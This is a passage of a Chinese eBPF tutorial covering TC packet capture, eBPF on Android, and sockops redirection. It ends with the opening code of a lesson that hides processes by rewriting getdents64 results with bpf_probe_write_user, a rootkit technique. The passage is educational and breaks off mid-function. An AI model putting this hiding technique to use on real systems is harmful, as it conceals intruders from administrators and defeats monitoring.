<p>这段代码定义了一个 eBPF 程序,它可以通过 Linux TC(Transmission Control)来捕获数据包并进行处理。在这个程序中,我们限定了只捕获 IPv4 协议的数据包,然后通过 bpf_printk 函数打印出数据包的总长度和 Time-To-Live(TTL)字段的值。</p>
|
||
<p>需要注意的是,我们在代码中使用了一些 BPF 库函数,例如 bpf_htons 和 bpf_ntohs 函数,它们用于进行网络字节序和主机字节序之间的转换。此外,我们还使用了一些注释来为 TC 提供附加点和选项信息。例如,在这段代码的开头,我们使用了以下注释:</p>
|
||
<pre><code class="language-c">/// @tchook {"ifindex":1, "attach_point":"BPF_TC_INGRESS"}
|
||
/// @tcopts {"handle":1, "priority":1}
|
||
</code></pre>
|
||
<p>这些注释告诉 TC 将 eBPF 程序附加到网络接口的 ingress 附加点,并指定了 handle 和 priority 选项的值。关于 libbpf 中 tc 相关的 API 可以参考 <a href="https://patchwork.kernel.org/project/netdevbpf/patch/20210512103451.989420-3-memxor@gmail.com/">patchwork</a> 中的介绍。</p>
|
||
<p>总之,这段代码实现了一个简单的 eBPF 程序,用于捕获数据包并打印出它们的信息。</p>
|
||
<h2 id="编译运行-7"><a class="header" href="#编译运行-7">编译运行</a></h2>
|
||
<p>通过容器编译:</p>
|
||
<pre><code class="language-console">docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest
|
||
</code></pre>
|
||
<p>或是通过 <code>ecc</code> 编译:</p>
|
||
<pre><code class="language-console">$ ecc tc.bpf.c
|
||
Compiling bpf object...
|
||
Packing ebpf object and config into package.json...
|
||
</code></pre>
|
||
<p>并通过 <code>ecli</code> 运行:</p>
|
||
<pre><code class="language-shell">sudo ecli run ./package.json
|
||
</code></pre>
|
||
<p>可以通过如下方式查看程序的输出:</p>
|
||
<pre><code class="language-console">$ sudo cat /sys/kernel/debug/tracing/trace_pipe
|
||
node-1254811 [007] ..s1 8737831.671074: 0: Got IP packet: tot_len: 79, ttl: 64
|
||
sshd-1254728 [006] ..s1 8737831.674334: 0: Got IP packet: tot_len: 79, ttl: 64
|
||
sshd-1254728 [006] ..s1 8737831.674349: 0: Got IP packet: tot_len: 72, ttl: 64
|
||
node-1254811 [007] ..s1 8737831.674550: 0: Got IP packet: tot_len: 71, ttl: 64
|
||
</code></pre>
|
||
<h2 id="总结-17"><a class="header" href="#总结-17">总结</a></h2>
|
||
<p>本文介绍了如何向 TC 流量控制子系统挂载 eBPF 类型的 filter 来实现对链路层数据包的排队处理。基于 eunomia-bpf 提供的通过注释向 libbpf 传递参数的方案,我们可以将自己编写的 tc BPF 程序以指定选项挂载到目标网络设备,并借助内核的 sk_buff 结构对数据包进行过滤处理。</p>
|
||
<p>如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 <a href="https://github.com/eunomia-bpf/bpf-developer-tutorial">https://github.com/eunomia-bpf/bpf-developer-tutorial</a> 以获取更多示例和完整的教程。</p>
|
||
<h2 id="参考-1"><a class="header" href="#参考-1">参考</a></h2>
|
||
<ul>
|
||
<li><a href="http://just4coding.com/2022/08/05/tc/">http://just4coding.com/2022/08/05/tc/</a></li>
|
||
<li><a href="https://arthurchiao.art/blog/understanding-tc-da-mode-zh/">https://arthurchiao.art/blog/understanding-tc-da-mode-zh/</a></li>
|
||
</ul>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="在-andorid-上使用-ebpf-程序"><a class="header" href="#在-andorid-上使用-ebpf-程序">在 Andorid 上使用 eBPF 程序</a></h1>
|
||
<blockquote>
|
||
<p>本文主要记录了笔者在 Android Studio Emulator 中测试高版本 Android Kernel 对基于 libbpf 的 CO-RE 技术支持程度的探索过程、结果和遇到的问题。
|
||
测试采用的方式是在 Android Shell 环境下构建 Debian 环境,并基于此尝试构建 eunomia-bpf 工具链、运行其测试用例。</p>
|
||
</blockquote>
|
||
<h2 id="背景-4"><a class="header" href="#背景-4">背景</a></h2>
|
||
<p>截至目前(2023-04),Android 还未对 eBPF 程序的动态加载做出较好的支持,无论是以 bcc 为代表的带编译器分发方案,还是基于 btf 和 libbpf 的 CO-RE 方案,都在较大程度上离不开 Linux 环境的支持,无法在 Android 系统上很好地运行<sup class="footnote-reference"><a href="#WeiShu">1</a></sup>。</p>
|
||
<p>虽然如此,在 Android 平台上尝试 eBPF 也已经有了一些成功案例,除谷歌官方提供的修改 <code>Android.bp</code> 以将 eBPF 程序随整个系统一同构建并挂载的方案<sup class="footnote-reference"><a href="#Google">2</a></sup>,也有人提出基于 Android 内核构建 Linux 环境进而运行 eBPF 工具链的思路,并开发了相关工具。</p>
|
||
<p>目前已有的资料,大多基于 adeb/eadb 在 Android 内核基础上构建 Linux 沙箱,并对 bcc 和 bpftrace 相关工具链进行测试,而对 CO-RE 方案的测试工作较少。在 Android 上使用 bcc 工具目前有较多参考资料,如:</p>
|
||
<ul>
|
||
<li>SeeFlowerX:<a href="https://blog.seeflower.dev/category/eBPF/">https://blog.seeflower.dev/category/eBPF/</a></li>
|
||
<li>evilpan:<a href="https://bbs.kanxue.com/thread-271043.htm">https://bbs.kanxue.com/thread-271043.htm</a></li>
|
||
</ul>
|
||
<p>其主要思路是利用 chroot 在 Android 内核上运行一个 Debian 镜像,并在其中构建整个 bcc 工具链,从而使用 eBPF 工具。如果想要使用 bpftrace,原理也是类似的。</p>
|
||
<p>事实上,高版本的 Android 内核已支持 btf 选项,这意味着 eBPF 领域中新兴的 CO-RE 技术也应当能够运用到基于 Android 内核的 Linux 系统中。本文将基于此对 eunomia-bpf 在模拟器环境下进行测试运行。</p>
|
||
<blockquote>
|
||
<p><a href="https://github.com/eunomia-bpf/eunomia-bpf">eunomia-bpf</a> 是一个结合了 libbpf 和 WebAssembly 技术的开源项目,旨在简化 eBPF 程序的编写、编译和部署。该项目可被视作 CO-RE 的一种实践方式,其核心依赖是 libbpf,相信对 eunomia-bpf 的测试工作能够为其他 CO-RE 方案提供参考。</p>
|
||
</blockquote>
|
||
<h2 id="测试环境"><a class="header" href="#测试环境">测试环境</a></h2>
|
||
<ul>
|
||
<li>Android Emulator(Android Studio Flamingo | 2022.2.1)</li>
|
||
<li>AVD: Pixel 6</li>
|
||
<li>Android Image: Tiramisu Android 13.0 x86_64(5.15.41-android13-8-00055-g4f5025129fe8-ab8949913)</li>
|
||
</ul>
|
||
<h2 id="环境搭建3"><a class="header" href="#环境搭建3">环境搭建<sup class="footnote-reference"><a href="#SeeFlowerX">3</a></sup></a></h2>
|
||
<ol>
|
||
<li>从 <a href="https://github.com/tiann/eadb">eadb 仓库</a> 的 releases 页面获取 <code>debianfs-amd64-full.tar.gz</code> 作为 Linux 环境的 rootfs,同时还需要获取该项目的 <code>assets</code> 目录来构建环境;</li>
|
||
<li>从 Android Studio 的 Device Manager 配置并启动 Android Virtual Device;</li>
|
||
<li>通过 Android Studio SDK 的 adb 工具将 <code>debianfs-amd64-full.tar.gz</code> 和 <code>assets</code> 目录推送到 AVD 中:
|
||
<ul>
|
||
<li><code>./adb push debianfs-amd64-full.tar.gz /data/local/tmp/deb.tar.gz</code></li>
|
||
<li><code>./adb push assets /data/local/tmp/assets</code></li>
|
||
</ul>
|
||
</li>
|
||
<li>通过 adb 进入 Android shell 环境并获取 root 权限:
|
||
<ul>
|
||
<li><code>./adb shell</code></li>
|
||
<li><code>su</code></li>
|
||
</ul>
|
||
</li>
|
||
<li>在 Android shell 中构建并进入 debian 环境:
|
||
<ul>
|
||
<li><code>mkdir -p /data/eadb</code></li>
|
||
<li><code>mv /data/local/tmp/assets/* /data/eadb</code></li>
|
||
<li><code>mv /data/local/tmp/deb.tar.gz /data/eadb/deb.tar.gz</code></li>
|
||
<li><code>rm -r /data/local/tmp/assets</code></li>
|
||
<li><code>chmod +x /data/eadb/device-*</code></li>
|
||
<li><code>/data/eadb/device-unpack</code></li>
|
||
<li><code>/data/eadb/run /data/eadb/debian</code></li>
|
||
</ul>
|
||
</li>
|
||
</ol>
|
||
<p>至此,测试 eBPF 所需的 Linux 环境已经构建完毕。此外,在 Android shell 中(未进入 debian 时)可以通过 <code>zcat /proc/config.gz</code> 并配合 <code>grep</code> 查看内核编译选项。</p>
|
||
<blockquote>
|
||
<p>目前,eadb 打包的 debian 环境存在 libc 版本低,缺少的工具依赖较多等情况;并且由于内核编译选项不同,一些 eBPF 功能可能也无法使用。</p>
|
||
</blockquote>
|
||
<h2 id="工具构建"><a class="header" href="#工具构建">工具构建</a></h2>
|
||
<p>在 debian 环境中将 eunomia-bpf 仓库 clone 到本地,具体的构建过程,可以参考仓库的 <a href="https://github.com/eunomia-bpf/eunomia-bpf/blob/master/documents/build.md">build.md</a>。在本次测试中,笔者选用了 <code>ecc</code> 编译生成 <code>package.json</code> 的方式,该工具的构建和使用方式请参考<a href="https://github.com/eunomia-bpf/eunomia-bpf/tree/master/compiler">仓库页面</a>。</p>
|
||
<blockquote>
|
||
<p>在构建过程中,可能需要自行安装包括但不限于 <code>curl</code>,<code>pkg-config</code>,<code>libssl-dev</code> 等工具。</p>
|
||
</blockquote>
|
||
<h2 id="结果"><a class="header" href="#结果">结果</a></h2>
|
||
<p>有部分 eBPF 程序可以成功在 Android 上运行,但也会有部分应用因为种种原因无法成功被执行。</p>
|
||
<h3 id="成功案例"><a class="header" href="#成功案例">成功案例</a></h3>
|
||
<h4 id="bootstrap-1"><a class="header" href="#bootstrap-1"><a href="https://github.com/eunomia-bpf/eunomia-bpf/tree/master/examples/bpftools/bootstrap">bootstrap</a></a></h4>
|
||
<p>运行输出如下:</p>
|
||
<pre><code class="language-console">TIME PID PPID EXIT_CODE DURATION_NS COMM FILENAME EXIT_EVENT
|
||
09:09:19 10217 479 0 0 sh /system/bin/sh 0
|
||
09:09:19 10217 479 0 0 ps /system/bin/ps 0
|
||
09:09:19 10217 479 0 54352100 ps 1
|
||
09:09:21 10219 479 0 0 sh /system/bin/sh 0
|
||
09:09:21 10219 479 0 0 ps /system/bin/ps 0
|
||
09:09:21 10219 479 0 44260900 ps 1
|
||
</code></pre>
|
||
<h4 id="tcpstates"><a class="header" href="#tcpstates"><a href="https://github.com/eunomia-bpf/eunomia-bpf/tree/master/examples/bpftools/tcpstates">tcpstates</a></a></h4>
|
||
<p>开始监测后在 Linux 环境中通过 <code>wget</code> 下载 Web 页面:</p>
|
||
<pre><code class="language-console">TIME SADDR DADDR SKADDR TS_US DELTA_US PID OLDSTATE NEWSTATE FAMILY SPORT DPORT TASK
|
||
09:07:46 0x4007000200005000000000000f02000a 0x5000000000000f02000a8bc53f77 18446635827774444352 3315344998 0 10115 7 2 2 0 80 wget
|
||
09:07:46 0x40020002d98e50003d99f8090f02000a 0xd98e50003d99f8090f02000a8bc53f77 18446635827774444352 3315465870 120872 0 2 1 2 55694 80 swapper/0
|
||
09:07:46 0x40010002d98e50003d99f8090f02000a 0xd98e50003d99f8090f02000a8bc53f77 18446635827774444352 3315668799 202929 10115 1 4 2 55694 80 wget
|
||
09:07:46 0x40040002d98e50003d99f8090f02000a 0xd98e50003d99f8090f02000a8bc53f77 18446635827774444352 3315670037 1237 0 4 5 2 55694 80 swapper/0
|
||
09:07:46 0x40050002000050003d99f8090f02000a 0x50003d99f8090f02000a8bc53f77 18446635827774444352 3315670225 188 0 5 7 2 55694 80 swapper/0
|
||
09:07:47 0x400200020000bb01565811650f02000a 0xbb01565811650f02000a6aa0d9ac 18446635828348806592 3316433261 0 2546 2 7 2 49970 443 ChromiumNet
|
||
09:07:47 0x400200020000bb01db794a690f02000a 0xbb01db794a690f02000aea2afb8e 18446635827774427776 3316535591 0 1469 2 7 2 37386 443 ChromiumNet
|
||
</code></pre>
|
||
<p>开始检测后在 Android Studio 模拟界面打开 Chrome 浏览器并访问百度页面:</p>
|
||
<pre><code class="language-console">TIME SADDR DADDR SKADDR TS_US DELTA_US PID OLDSTATE NEWSTATE FAMILY SPORT DPORT TASK
|
||
07:46:58 0x400700020000bb01000000000f02000a 0xbb01000000000f02000aeb6f2270 18446631020066638144 192874641 0 3305 7 2 2 0 443 NetworkService
|
||
07:46:58 0x40020002d28abb01494b6ebe0f02000a 0xd28abb01494b6ebe0f02000aeb6f2270 18446631020066638144 192921938 47297 3305 2 1 2 53898 443 NetworkService
|
||
07:46:58 0x400700020000bb01000000000f02000a 0xbb01000000000f02000ae7e7e8b7 18446631020132433920 193111426 0 3305 7 2 2 0 443 NetworkService
|
||
07:46:58 0x40020002b4a0bb0179ff85e80f02000a 0xb4a0bb0179ff85e80f02000ae7e7e8b7 18446631020132433920 193124670 13244 3305 2 1 2 46240 443 NetworkService
|
||
07:46:58 0x40010002b4a0bb0179ff85e80f02000a 0xb4a0bb0179ff85e80f02000ae7e7e8b7 18446631020132433920 193185397 60727 3305 1 4 2 46240 443 NetworkService
|
||
07:46:58 0x40040002b4a0bb0179ff85e80f02000a 0xb4a0bb0179ff85e80f02000ae7e7e8b7 18446631020132433920 193186122 724 3305 4 5 2 46240 443 NetworkService
|
||
07:46:58 0x400500020000bb0179ff85e80f02000a 0xbb0179ff85e80f02000ae7e7e8b7 18446631020132433920 193186244 122 3305 5 7 2 46240 443 NetworkService
|
||
07:46:59 0x40010002d01ebb01d0c52f5c0f02000a 0xd01ebb01d0c52f5c0f02000a51449c27 18446631020103553856 194110884 0 5130 1 8 2 53278 443 ThreadPoolForeg
|
||
07:46:59 0x400800020000bb01d0c52f5c0f02000a 0xbb01d0c52f5c0f02000a51449c27 18446631020103553856 194121000 10116 3305 8 7 2 53278 443 NetworkService
|
||
07:46:59 0x400700020000bb01000000000f02000a 0xbb01000000000f02000aeb6f2270 18446631020099513920 194603677 0 3305 7 2 2 0 443 NetworkService
|
||
07:46:59 0x40020002d28ebb0182dd92990f02000a 0xd28ebb0182dd92990f02000aeb6f2270 18446631020099513920 194649313 45635 12 2 1 2 53902 443 ksoftirqd/0
|
||
07:47:00 0x400700020000bb01000000000f02000a 0xbb01000000000f02000a26f6e878 18446631020132433920 195193350 0 3305 7 2 2 0 443 NetworkService
|
||
07:47:00 0x40020002ba32bb01e0e09e3a0f02000a 0xba32bb01e0e09e3a0f02000a26f6e878 18446631020132433920 195206992 13642 0 2 1 2 47666 443 swapper/0
|
||
07:47:00 0x400700020000bb01000000000f02000a 0xbb01000000000f02000ae7e7e8b7 18446631020132448128 195233125 0 3305 7 2 2 0 443 NetworkService
|
||
07:47:00 0x40020002b4a8bb0136cac8dd0f02000a 0xb4a8bb0136cac8dd0f02000ae7e7e8b7 18446631020132448128 195246569 13444 3305 2 1 2 46248 443 NetworkService
|
||
07:47:00 0xf02000affff00000000000000000000 0x1aca06cffff00000000000000000000 18446631019225912320 195383897 0 947 7 2 10 0 80 Thread-11
|
||
07:47:00 0x40010002b4a8bb0136cac8dd0f02000a 0xb4a8bb0136cac8dd0f02000ae7e7e8b7 18446631020132448128 195421584 175014 3305 1 4 2 46248 443 NetworkService
|
||
07:47:00 0x40040002b4a8bb0136cac8dd0f02000a 0xb4a8bb0136cac8dd0f02000ae7e7e8b7 18446631020132448128 195422361 777 3305 4 5 2 46248 443 NetworkService
|
||
07:47:00 0x400500020000bb0136cac8dd0f02000a 0xbb0136cac8dd0f02000ae7e7e8b7 18446631020132448128 195422450 88 3305 5 7 2 46248 443 NetworkService
|
||
07:47:01 0x400700020000bb01000000000f02000a 0xbb01000000000f02000aea2afb8e 18446631020099528128 196321556 0 1315 7 2 2 0 443 ChromiumNet
|
||
</code></pre>
|
||
<h3 id="一些可能的报错原因"><a class="header" href="#一些可能的报错原因">一些可能的报错原因</a></h3>
|
||
<h4 id="opensnoop"><a class="header" href="#opensnoop"><a href="https://github.com/eunomia-bpf/eunomia-bpf/tree/master/examples/bpftools/opensnoop">opensnoop</a></a></h4>
|
||
<p>例如 opensnoop 工具,可以在 Android 上成功构建,但运行报错:</p>
|
||
<pre><code class="language-console">libbpf: failed to determine tracepoint 'syscalls/sys_enter_open' perf event ID: No such file or directory
|
||
libbpf: prog 'tracepoint__syscalls__sys_enter_open': failed to create tracepoint 'syscalls/sys_enter_open' perf event: No such file or directory
|
||
libbpf: prog 'tracepoint__syscalls__sys_enter_open': failed to auto-attach: -2
|
||
failed to attach skeleton
|
||
Error: BpfError("load and attach ebpf program failed")
|
||
</code></pre>
|
||
<p>后经查看发现内核未开启 <code>CONFIG_FTRACE_SYSCALLS</code> 选项,导致无法使用 syscalls 的 tracepoint。</p>
|
||
<h2 id="总结-18"><a class="header" href="#总结-18">总结</a></h2>
|
||
<p>在 Android shell 中查看内核编译选项可以发现 <code>CONFIG_DEBUG_INFO_BTF</code> 默认是打开的,在此基础上 eunomia-bpf 项目提供的 example 已有一些能够成功运行的案例,例如可以监测 <code>exec</code> 族函数的执行和 tcp 连接的状态。</p>
|
||
<p>对于无法运行的一些,原因主要是以下两个方面:</p>
|
||
<ol>
|
||
<li>内核编译选项未支持相关 eBPF 功能;</li>
|
||
<li>eadb 打包的 Linux 环境较弱,缺乏必须依赖;</li>
|
||
</ol>
|
||
<p>目前在 Android 系统中使用 eBPF 工具基本上仍然需要构建完整的 Linux 运行环境,但 Android 内核本身对 eBPF 的支持已较为全面,本次测试证明较高版本的 Android 内核支持 BTF 调试信息和依赖 CO-RE 的 eBPF 程序的运行。</p>
|
||
<p>Android 系统 eBPF 工具的发展需要官方新特性的加入,目前看来通过 Android APP 直接使用 eBPF 工具需要的工作量较大,同时由于 eBPF 工具需要 root 权限,普通 Android 用户的使用会面临较多困难。</p>
|
||
<p>如果希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 <a href="https://github.com/eunomia-bpf/bpf-developer-tutorial">https://github.com/eunomia-bpf/bpf-developer-tutorial</a> 以获取更多示例和完整的教程。</p>
|
||
<h2 id="参考-2"><a class="header" href="#参考-2">参考</a></h2>
|
||
<div class="footnote-definition" id="Google"><sup class="footnote-definition-label">2</sup>
|
||
<p><a href="https://source.android.google.cn/docs/core/architecture/kernel/bpf">https://source.android.google.cn/docs/core/architecture/kernel/bpf</a>
|
||
<sup class="footnote-reference"><a href="#WeiShu">1</a></sup>:<a href="https://mp.weixin.qq.com/s/mul4n5D3nXThjxuHV7GpMA">https://mp.weixin.qq.com/s/mul4n5D3nXThjxuHV7GpMA</a>
|
||
<sup class="footnote-reference"><a href="#SeeFlowerX">3</a></sup>:<a href="https://blog.seeflower.dev/archives/138/">https://blog.seeflower.dev/archives/138/</a></p>
|
||
</div>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="http"><a class="header" href="#http">http</a></h1>
|
||
<p>TODO</p>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="ebpf-sockops-示例"><a class="header" href="#ebpf-sockops-示例">eBPF sockops 示例</a></h1>
|
||
<h2 id="利用-ebpf-的-sockops-进行性能优化"><a class="header" href="#利用-ebpf-的-sockops-进行性能优化">利用 eBPF 的 sockops 进行性能优化</a></h2>
|
||
<p>网络连接本质上是 socket 之间的通讯,eBPF 提供了一个 <a href="https://man7.org/linux/man-pages/man7/bpf-helpers.7.html">bpf_msg_redirect_hash</a> 函数,用来将应用发出的包直接转发到对端的 socket,可以极大地加速包在内核中的处理流程。</p>
|
||
<p>这里 sock_map 是记录 socket 规则的关键部分,即根据当前的数据包信息,从 sock_map 中挑选一个存在的 socket 连接来转发请求。所以需要先在 sockops 的 hook 处或者其它地方,将 socket 信息保存到 sock_map,并提供一个规则 (一般为四元组) 根据 key 查找到 socket。</p>
|
||
<p>Merbridge 项目就是这样实现了用 eBPF 代替 iptables 为 Istio 进行加速。在使用 Merbridge (eBPF) 优化之后,出入口流量会直接跳过很多内核模块,明显提高性能,如下图所示:</p>
|
||
<p><img src="29-sockops/merbridge.png" alt="merbridge" /></p>
|
||
<h2 id="运行样例"><a class="header" href="#运行样例">运行样例</a></h2>
|
||
<p>此示例程序从发送者的套接字(出口)重定向流量至接收者的套接字(入口),<strong>跳过 TCP/IP 内核网络栈</strong>。在这个示例中,我们假定发送者和接收者都在<strong>同一台</strong>机器上运行。</p>
|
||
<h3 id="编译-ebpf-程序"><a class="header" href="#编译-ebpf-程序">编译 eBPF 程序</a></h3>
|
||
<pre><code class="language-shell"># Compile the bpf_sockops program
|
||
clang -O2 -g -Wall -target bpf -c bpf_sockops.c -o bpf_sockops.o
|
||
clang -O2 -g -Wall -target bpf -c bpf_redir.c -o bpf_redir.o
|
||
</code></pre>
|
||
<h3 id="加载-ebpf-程序"><a class="header" href="#加载-ebpf-程序">加载 eBPF 程序</a></h3>
|
||
<pre><code class="language-shell">sudo ./load.sh
|
||
</code></pre>
|
||
<p>您可以使用 <a href="https://github.com/torvalds/linux/blob/master/tools/bpf/bpftool/Documentation/bpftool-prog.rst">bpftool utility</a> 检查这两个 eBPF 程序是否已经加载。</p>
|
||
<pre><code class="language-console">$ sudo bpftool prog show
|
||
63: sock_ops name bpf_sockmap tag 275467be1d69253d gpl
|
||
loaded_at 2019-01-24T13:07:17+0200 uid 0
|
||
xlated 1232B jited 750B memlock 4096B map_ids 58
|
||
64: sk_msg name bpf_redir tag bc78074aa9dd96f4 gpl
|
||
loaded_at 2019-01-24T13:07:17+0200 uid 0
|
||
xlated 304B jited 233B memlock 4096B map_ids 58
|
||
</code></pre>
|
||
<h3 id="运行-iperf3-服务器"><a class="header" href="#运行-iperf3-服务器">运行 <a href="https://iperf.fr/">iperf3</a> 服务器</a></h3>
|
||
<pre><code class="language-shell">iperf3 -s -p 10000
|
||
</code></pre>
|
||
<h3 id="运行-iperf3-客户端"><a class="header" href="#运行-iperf3-客户端">运行 <a href="https://iperf.fr/">iperf3</a> 客户端</a></h3>
|
||
<pre><code class="language-shell">iperf3 -c 127.0.0.1 -t 10 -l 64k -p 10000
|
||
</code></pre>
|
||
<h3 id="收集追踪"><a class="header" href="#收集追踪">收集追踪</a></h3>
|
||
<pre><code class="language-console">$ ./trace.sh
|
||
iperf3-9516 [001] .... 22500.634108: 0: <<< ipv4 op = 4, port 18583 --> 4135
|
||
iperf3-9516 [001] ..s1 22500.634137: 0: <<< ipv4 op = 5, port 4135 --> 18583
|
||
iperf3-9516 [001] .... 22500.634523: 0: <<< ipv4 op = 4, port 19095 --> 4135
|
||
iperf3-9516 [001] ..s1 22500.634536: 0: <<< ipv4 op = 5, port 4135 --> 19095
|
||
</code></pre>
|
||
<p>你应该可以看到 4 个用于套接字建立的事件。如果你没有看到任何事件,那么 eBPF 程序可能没有正确地附加上。</p>
|
||
<h3 id="卸载-ebpf-程序"><a class="header" href="#卸载-ebpf-程序">卸载 eBPF 程序</a></h3>
|
||
<pre><code class="language-shell">sudo ./unload.sh
|
||
</code></pre>
|
||
<h2 id="参考资料-1"><a class="header" href="#参考资料-1">参考资料</a></h2>
|
||
<ul>
|
||
<li><a href="https://github.com/zachidan/ebpf-sockops">https://github.com/zachidan/ebpf-sockops</a></li>
|
||
<li><a href="https://github.com/merbridge/merbridge">https://github.com/merbridge/merbridge</a></li>
|
||
</ul>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="ebpf-开发实践使用-ebpf-隐藏进程或文件信息"><a class="header" href="#ebpf-开发实践使用-ebpf-隐藏进程或文件信息">eBPF 开发实践:使用 eBPF 隐藏进程或文件信息</a></h1>
|
||
<p>eBPF(扩展的伯克利数据包过滤器)是 Linux 内核中的一个强大功能,可以在无需更改内核源代码或重启内核的情况下,运行、加载和更新用户定义的代码。这种功能让 eBPF 在网络和系统性能分析、数据包过滤、安全策略等方面有了广泛的应用。</p>
|
||
<p>在本篇教程中,我们将展示如何利用 eBPF 来隐藏进程或文件信息,这是网络安全和防御领域中一种常见的技术。</p>
|
||
<h2 id="背景知识与实现机制"><a class="header" href="#背景知识与实现机制">背景知识与实现机制</a></h2>
|
||
<p>"进程隐藏" 能让特定的进程对操作系统的常规检测机制变得不可见。在黑客攻击或系统防御的场景中,这种技术都可能被应用。具体来说,Linux 系统中每个进程都在 /proc/ 目录下有一个以其进程 ID 命名的子文件夹,包含了该进程的各种信息。<code>ps</code> 命令就是通过查找这些文件夹来显示进程信息的。因此,如果我们能隐藏某个进程的 /proc/ 文件夹,就能让这个进程对 <code>ps</code> 命令等检测手段“隐身”。</p>
|
||
<p>要实现进程隐藏,关键在于操作 <code>/proc/</code> 目录。在 Linux 中,<code>getdents64</code> 系统调用可以读取目录下的文件信息。我们可以通过挂接这个系统调用,修改它返回的结果,从而达到隐藏文件的目的。实现这个功能需要使用到 eBPF 的 <code>bpf_probe_write_user</code> 功能,它可以修改用户空间的内存,因此能用来修改 <code>getdents64</code> 返回的结果。</p>
|
||
<p>下面,我们会详细介绍如何在内核态和用户态编写 eBPF 程序来实现进程隐藏。</p>
|
||
<h3 id="内核态-ebpf-程序实现-1"><a class="header" href="#内核态-ebpf-程序实现-1">内核态 eBPF 程序实现</a></h3>
|
||
<p>接下来,我们将详细介绍如何在内核态编写 eBPF 程序来实现进程隐藏。首先是 eBPF 程序的起始部分:</p>
|
||
<pre><code class="language-c">// SPDX-License-Identifier: BSD-3-Clause
|
||
#include "vmlinux.h"
|
||
#include <bpf/bpf_helpers.h>
|
||
#include <bpf/bpf_tracing.h>
|
||
#include <bpf/bpf_core_read.h>
|
||
#include "common.h"
|
||
|
||
char LICENSE[] SEC("license") = "Dual BSD/GPL";
|
||
|
||
// Ringbuffer Map to pass messages from kernel to user
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_RINGBUF);
|
||
__uint(max_entries, 256 * 1024);
|
||
} rb SEC(".maps");
|
||
|
||
// Map to fold the dents buffer addresses
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_HASH);
|
||
__uint(max_entries, 8192);
|
||
__type(key, size_t);
|
||
__type(value, long unsigned int);
|
||
} map_buffs SEC(".maps");
|
||
|
||
// Map used to enable searching through the
|
||
// data in a loop
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_HASH);
|
||
__uint(max_entries, 8192);
|
||
__type(key, size_t);
|
||
__type(value, int);
|
||
} map_bytes_read SEC(".maps");
|
||
|
||
// Map with address of actual
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_HASH);
|
||
__uint(max_entries, 8192);
|
||
__type(key, size_t);
|
||
__type(value, long unsigned int);
|
||
} map_to_patch SEC(".maps");
|
||
|
||
// Map to hold program tail calls
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_PROG_ARRAY);
|
||
__uint(max_entries, 5);
|
||
__type(key, __u32);
|
||
__type(value, __u32);
|
||
} map_prog_array SEC(".maps");
|
||
</code></pre>
|
||
<p>我们首先需要理解这个 eBPF 程序的基本构成和使用到的几个重要组件。前几行引用了几个重要的头文件,如 "vmlinux.h"、"bpf_helpers.h"、"bpf_tracing.h" 和 "bpf_core_read.h"。这些文件提供了 eBPF 编程所需的基础设施和一些重要的函数或宏。</p>
|
||
<ul>
|
||
<li>"vmlinux.h" 是一个包含了完整的内核数据结构的头文件,是从 vmlinux 内核二进制中提取的。使用这个头文件,eBPF 程序可以访问内核的数据结构。</li>
|
||
<li>"bpf_helpers.h" 头文件中定义了一系列的宏,这些宏是 eBPF 程序使用的 BPF 助手(helper)函数的封装。这些 BPF 助手函数是 eBPF 程序和内核交互的主要方式。</li>
|
||
<li>"bpf_tracing.h" 是用于跟踪事件的头文件,它包含了许多宏和函数,这些都是为了简化 eBPF 程序对跟踪点(tracepoint)的操作。</li>
|
||
<li>"bpf_core_read.h" 头文件提供了一组用于从内核读取数据的宏和函数。</li>
|
||
</ul>
|
||
<p>程序中定义了一系列的 map 结构,这些 map 是 eBPF 程序中的主要数据结构,它们用于在内核态和用户态之间共享数据,或者在 eBPF 程序中存储和传递数据。</p>
|
||
<p>其中,"rb" 是一个 Ringbuffer 类型的 map,它用于从内核向用户态传递消息。Ringbuffer 是一种能在内核和用户态之间高效传递大量数据的数据结构。</p>
|
||
<p>"map_buffs" 是一个 Hash 类型的 map,它用于存储目录项(dentry)的缓冲区地址。</p>
|
||
<p>"map_bytes_read" 是另一个 Hash 类型的 map,它用于在数据循环中启用搜索。</p>
|
||
<p>"map_to_patch" 是另一个 Hash 类型的 map,存储了需要被修改的目录项(dentry)的地址。</p>
|
||
<p>"map_prog_array" 是一个 Prog Array 类型的 map,它用于保存程序的尾部调用。</p>
|
||
<p>程序中的 "target_ppid" 和 "pid_to_hide_len"、"pid_to_hide" 是几个重要的全局变量,它们分别存储了目标父进程的 PID、需要隐藏的 PID 的长度以及需要隐藏的 PID。</p>
|
||
<p>接下来的代码部分,程序定义了一个名为 "linux_dirent64" 的结构体,这个结构体代表一个 Linux 目录项。然后程序定义了两个函数,"handle_getdents_enter" 和 "handle_getdents_exit",这两个函数分别在 getdents64 系统调用的入口和出口被调用,用于实现对目录项的操作。</p>
|
||
<pre><code class="language-c">
|
||
// Optional Target Parent PID
|
||
const volatile int target_ppid = 0;
|
||
|
||
// These store the string represenation
|
||
// of the PID to hide. This becomes the name
|
||
// of the folder in /proc/
|
||
const volatile int pid_to_hide_len = 0;
|
||
const volatile char pid_to_hide[max_pid_len];
|
||
|
||
// struct linux_dirent64 {
|
||
// u64 d_ino; /* 64-bit inode number */
|
||
// u64 d_off; /* 64-bit offset to next structure */
|
||
// unsigned short d_reclen; /* Size of this dirent */
|
||
// unsigned char d_type; /* File type */
|
||
// char d_name[]; /* Filename (null-terminated) */ };
|
||
// int getdents64(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count);
|
||
SEC("tp/syscalls/sys_enter_getdents64")
|
||
int handle_getdents_enter(struct trace_event_raw_sys_enter *ctx)
|
||
{
|
||
size_t pid_tgid = bpf_get_current_pid_tgid();
|
||
// Check if we're a process thread of interest
|
||
// if target_ppid is 0 then we target all pids
|
||
if (target_ppid != 0) {
|
||
struct task_struct *task = (struct task_struct *)bpf_get_current_task();
|
||
